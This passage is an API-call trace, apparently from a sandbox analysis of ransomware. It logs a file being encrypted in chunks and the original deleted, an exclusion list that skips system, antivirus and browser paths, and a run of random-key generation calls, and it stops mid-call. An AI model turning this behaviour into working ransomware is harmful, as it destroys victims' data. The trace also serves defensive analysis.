nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.336] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.336] GetLastError () returned 0x0 [0166.336] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.336] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.336] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.336] GetLastError () returned 0x0 [0166.336] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.336] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.336] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.336] GetLastError () returned 0x0 [0166.336] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.336] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.336] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.336] GetLastError () returned 0x0 [0166.336] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.336] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.336] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.336] GetLastError () returned 0x0 [0166.336] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.337] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.337] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.337] GetLastError () returned 0x0 [0166.337] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.337] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.337] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.337] GetLastError () returned 0x0 [0166.337] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.337] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.337] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.337] GetLastError () returned 0x0 [0166.337] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.337] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.337] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.337] GetLastError () returned 0x0 [0166.337] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.337] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.337] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.337] GetLastError () returned 0x0 [0166.337] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.337] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.337] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.337] GetLastError () returned 0x0 [0166.337] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.337] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.338] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.338] GetLastError () returned 0x0 [0166.338] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.338] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.338] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.338] GetLastError () returned 0x0 [0166.338] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.338] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x42, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x42, lpOverlapped=0x0) returned 1 [0166.338] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x42, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x50) returned 1 [0166.338] GetLastError () returned 0x0 [0166.338] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x50, lpOverlapped=0x0) returned 1 [0166.338] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0166.338] WriteFile (in: hFile=0x15c4, lpBuffer=0x2891f68*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0166.338] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Tanspecks.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\tanspecks.jpg")) returned 0x20 [0166.338] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Tanspecks.jpg", dwFileAttributes=0x20) returned 0 [0166.338] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Tanspecks.jpg") returned 1 [0166.339] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Tanspecks.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\tanspecks.jpg")) returned 0 [0166.339] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Tanspecks.jpg" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Tanspecks.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Tanspecks.jpg" [0166.339] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Tanspecks.jpg" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0166.339] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFD4A.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfd4a.tmp")) returned 0xfd4a [0166.339] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Tanspecks.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\tanspecks.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFD4A.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfd4a.tmp"), dwFlags=0x1) returned 0 [0166.339] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFD4A.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfd4a.tmp")) returned 1 [0166.340] CryptDestroyKey (hKey=0x9ad578) returned 1 [0166.340] wcslen (_String="OK") returned 0x2 [0166.340] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.340] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.340] CryptDestroyKey (hKey=0x9ad778) returned 1 [0166.340] CryptDestroyHash (hHash=0x9ad438) returned 1 [0166.340] CryptReleaseContext (hProv=0x8e3660, dwFlags=0x0) returned 1 [0166.340] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0166.340] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*NMCRYPT") returned 0 [0166.340] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*Recovers your files.html") returned 0 [0166.340] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*.exe") returned 0 [0166.340] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*.dll") returned 0 [0166.340] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*.lnk") returned 0 [0166.340] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*.bat") returned 0 [0166.340] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*.ini") returned 0 [0166.340] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*.msi") returned 0 [0166.340] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*.scf") returned 0 [0166.340] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*pagefile.sys*") returned 0 [0166.340] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*NTUSER.DAT*") returned 0 [0166.340] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*AppData*") returned 0 [0166.340] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*\\winrar\\*") returned 0 [0166.340] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*\\Internet Explorer\\*") returned 0 [0166.340] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*\\java\\*") returned 0 [0166.340] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*\\TeamViewer\\*") returned 0 [0166.340] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*\\windows\\*") returned 0 [0166.340] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*\\ESET\\*") returned 0 [0166.340] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*\\AVG\\*") returned 0 [0166.340] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*\\AVIRA\\*") returned 0 [0166.340] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*\\AVAST Software\\*") returned 0 [0166.340] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*Atheros*") returned 0 [0166.340] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*Realtek*") returned 0 [0166.340] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*bootmgr*") returned 0 [0166.340] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*boot*") returned 0 [0166.340] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*boot*") returned 0 [0166.340] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*CONFIG.SYS*") returned 0 [0166.340] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*IO.SYS*") returned 0 [0166.341] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*MSDOS.SYS*") returned 0 [0166.341] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*NTDETECT.COM*") returned 0 [0166.341] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*ntldr*") returned 0 [0166.341] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*chrome*") returned 0 [0166.341] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*opera*") returned 0 [0166.341] PathMatchSpecW (pszFile="Tiki.gif", pszSpec="*firefox*") returned 0 [0166.341] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Tiki.gif", pszSpec="*") returned 1 [0166.341] strlen (_Str="NMoreira") returned 0x8 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: 